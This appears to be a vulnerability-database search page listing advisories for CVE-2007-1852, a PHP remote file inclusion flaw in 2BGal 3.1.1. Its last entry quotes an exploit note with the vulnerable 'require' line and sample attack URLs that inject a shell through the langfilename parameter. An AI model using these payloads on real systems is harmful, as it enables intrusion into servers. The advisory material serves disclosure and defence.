6 matches found
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in 2BGal 3.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the langfilename parameter to 1 index.php or 2 backupdb.inc.php in admin/, or other unspecified files, different vectors than CVE-2006-5505. NOTE: this issue has bee...
CVE-2007-1852
Multiple PHP remote file inclusion vulnerabilities in 2BGal 3.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the langfilename parameter to 1 index.php or 2 backupdb.inc.php in admin/, or other unspecified files, different vectors than CVE-2006-5505. NOTE: this issue has bee...
CVE-2007-1852
CVE-2007-1852 affects 2BGal 3.1.1 with multiple PHP remote file inclusion vulnerabilities exposed via the URL parameter (lang_filename) to admin/index.php or admin/backupdb.inc.php (and other files). Root cause notes that lang_filename is defined before use, a detail disputed by CVE. Connected PT...
CVE-2007-1852
Multiple PHP remote file inclusion vulnerabilities in 2BGal 3.1.1 allow remote attackers to execute arbitrary PHP code via a URL in the langfilename parameter to 1 index.php or 2 backupdb.inc.php in admin/, or other unspecified files, different vectors than CVE-2006-5505. NOTE: this issue has bee...
PT-2007-3204 · 2Bgal · 2Bgal
Name of the Vulnerable Software and Affected Versions: 2BGal version 3.1.1 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the lang filename parameter to 1 "index.php" or 2 "backupdb.inc.php" in admin/, or other unspecified files. Recommendations: For 2BG...
2bgal-rfi.txt
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 2BGal 3.1.1 Code: require$langfilename; =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= ExploiT: wWw.site.cOm/path/admin/index.php?langfilename= BorN-SHell wWw.site.cOm/path/admin/backupdb.inc.php?langfilename= BorN-SHell...